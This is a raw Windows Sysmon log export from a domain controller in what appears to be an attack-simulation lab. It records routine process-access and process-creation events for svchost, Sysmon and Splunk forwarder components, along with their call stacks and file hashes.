15:56:14.552{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006824Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006823Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006822Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006821Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006820Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006819Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006818Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7D9E-5FA1-7C01-000000008801}2472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006817Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D9E-5FA1-7C01-000000008801}2472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006816Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7D9E-5FA1-7C01-000000008801}2472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006843Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.364{D28789B6-7D9F-5FA1-7D01-000000008801}47243972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006842Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D9F-5FA1-7D01-000000008801}4724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006841Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006840Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006839Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006838Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006837Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006836Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006835Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006834Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006833Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006832Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7D9F-5FA1-7D01-000000008801}4724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006831Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D9F-5FA1-7D01-000000008801}4724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006830Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:15.224{D28789B6-7D9F-5FA1-7D01-000000008801}4724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006856Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.367{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7DA0-5FA1-7E01-000000008801}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006855Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.366{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006854Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.366{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 